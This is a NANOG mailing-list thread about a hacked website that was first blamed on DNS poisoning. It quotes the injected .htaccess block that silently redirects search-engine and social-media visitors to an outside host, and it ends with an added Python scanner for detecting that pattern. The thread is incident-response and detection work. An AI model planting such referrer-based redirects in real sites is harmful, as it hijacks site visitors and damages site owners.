nanog mailing list archives

Re: No DNS poisoning at Google (in case of trouble, blame the DNS)


From: Kyle Creyts <kyle.creyts () gmail com>
Date: Tue, 3 Jul 2012 14:33:23 -0400

and upon further investigation, it seems like there might be an actual
organization using a host with that IP...

http://www.robtex.com/dns/chatwithus.net.html#shared

On Tue, Jul 3, 2012 at 2:27 PM, Kyle Creyts <kyle.creyts () gmail com> wrote:

it actually appears that skywire has a suballocation for that block,
http://www.robtex.com/ip/208.88.11.111.html#whois

#
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=208.88.11.111?showDetails=true&showARIN=false&ext=netref2
#

American West Internet SKYWIRE-SG (NET-208-88-11-0-1) 208.88.11.0 - 208.88.11.255

Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 - 208.88.11.255

#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#

On Wed, Jun 27, 2012 at 12:56 PM, Matthew Black <Matthew.Black () csulb edu> wrote:

By the way, FTP access originated from: 208.88.11.111

Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 -
208.88.11.255

NetRange:       208.88.8.0 - 208.88.11.255
CIDR:           208.88.8.0/22
OriginAS:       AS40603
NetName:        SKYWIRE-SG
NetHandle:      NET-208-88-8-0-1
Parent:         NET-208-0-0-0-0
NetType:        Direct Allocation
Comment:        http://www.skywireusa.com
RegDate:        2008-03-04
Updated:        2012-03-02
Ref:            http://whois.arin.net/rest/net/NET-208-88-8-0-1

OrgName:        Sky Wire Communications
OrgId:          DGSU
Address:        946 W Sunset Blvd Ste L
City:           St George
StateProv:      UT
PostalCode:     84770
Country:        US
RegDate:        2007-12-04
Updated:        2009-11-04
Ref:            http://whois.arin.net/rest/org/DGSU


Who We Are
Skywire Communications is the Leading High Speed Internet Provider in
Southern Utah. Offering Service in St George, Washington, Santa Clara,
Ivins, Cedar City, and Enoch. It is the goal of SkyWire Communications to
provide high speed internet access to 100 Percent of Southern Utah. We are
located in St George, Utah.




matthew black
information technology services
california state university, long beach



-----Original Message-----
From: Matthew Black [mailto:Matthew.Black () csulb edu]
Sent: Wednesday, June 27, 2012 9:52 AM
To: 'Jason Hellenthal'; Arturo Servin
Cc: nanog () nanog org
Subject: RE: No DNS poisoning at Google (in case of trouble, blame the DNS)

Ask and ye shall receive:

# more .htaccess (backup copy)

#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]
</IfModule>
#/c3284d#

          # # #

matthew black
information technology services
california state university, long beach



-----Original Message-----
From: Jason Hellenthal [mailto:jhellenthal () dataix net]
Sent: Wednesday, June 27, 2012 6:26 AM
To: Arturo Servin
Cc: nanog () nanog org
Subject: Re: No DNS poisoning at Google (in case of trouble, blame the DNS)


What would be nice is to see the contents of the htaccess file
(obviously with sensitive information excluded)

On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote:

It was not a DNS issue, but it was a clear case of how community support
helped.

Some of us may even learn some new tricks. :)

Regards,
as

Sent from mobile device. Excuse brevity and typos.


On 27 Jun 2012, at 05:07, Daniel Rohan <drohan () gmail com> wrote:

On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer <bortzmeyer () nic fr> wrote:

What made you think it can be a DNS cache poisoning (a very rare
event, despite what the media say) when there are many much more
realistic possibilities (<troll>specially for a Web site written in
PHP</troll>)?

What was the evidence pointing to a DNS problem?


It seems likely that he made a mistake in his analysis of the evidence.
Something that could happen to anyone when operating outside of a comfort
zone or having a bad day. Go easy.

-DR


--

 - (2^(N-1))

-- 
Kyle Creyts

Information Assurance Professional
BSidesDetroit Organizer
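
Added example, not part of the original thread or any participant's code: a small scanner for the pattern in the quoted .htaccess, where a RewriteCond on %{HTTP_REFERER} gates a RewriteRule pointing at an absolute URL on another host, wrapped in paired "#tag#" / "#/tag#" comments. The sample files, the placeholder host and the six-hex-digit tag format are assumptions constructed for illustration.

```python
import re

COND = re.compile(r"^\s*RewriteCond\s+(\S+)", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.I)
# Paired "#xxxxxx#" ... "#/xxxxxx#" comment tags, the shape seen in the thread.
# Treating six hex digits as the tag format is an assumption from that one sample.
MARK = re.compile(r"^\s*#(/?)([0-9a-f]{6})#\s*$", re.I)

# Constructed samples; the host is a placeholder and the referrer list is shortened.
INFECTED = r"""# site rules
Options -Indexes
#a1b2c3#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|bing|yahoo|facebook)\.(.*)
RewriteRule ^(.*)$ http://redirect.example.invalid/media.php [R=301,L]
</IfModule>
#/a1b2c3#
"""
CLEAN = r"""RewriteEngine On
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://%{HTTP_HOST}/$1 [R=301,L]
RewriteCond %{HTTP_REFERER} !^https?://(www\.)?example\.org/ [NC]
RewriteRule \.(jpg|png)$ - [F]
"""

def scan_htaccess(text):
    """Return findings for referrer-gated external redirects and tagged blocks."""
    findings, conds, open_tags = [], [], {}
    for n, line in enumerate(text.splitlines(), 1):
        if m := MARK.match(line):
            closing, tag = m.group(1), m.group(2).lower()
            if not closing:
                open_tags[tag] = n
            elif tag in open_tags:
                findings.append(("tagged-block", open_tags.pop(tag), n))
        elif m := COND.match(line):
            conds.append(m.group(1).upper())   # conditions bind to the next rule
        elif m := RULE.match(line):
            target = m.group(1)
            # An absolute URL with a literal host makes mod_rewrite redirect
            # externally when that host is not the current one, with or without [R].
            external = re.match(r"https?://[a-z0-9]", target, re.I) is not None
            if "%{HTTP_REFERER}" in conds and external:
                findings.append(("referer-redirect", n, target))
            conds = []                          # Apache resets conditions per rule
    return findings

if __name__ == "__main__":
    for name, text in (("infected", INFECTED), ("clean", CLEAN)):
        print(name, scan_htaccess(text))
```

The clean sample shows the two legitimate uses that must not trip the check: an HTTPS redirect to the site's own host and referrer-based hotlink blocking.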

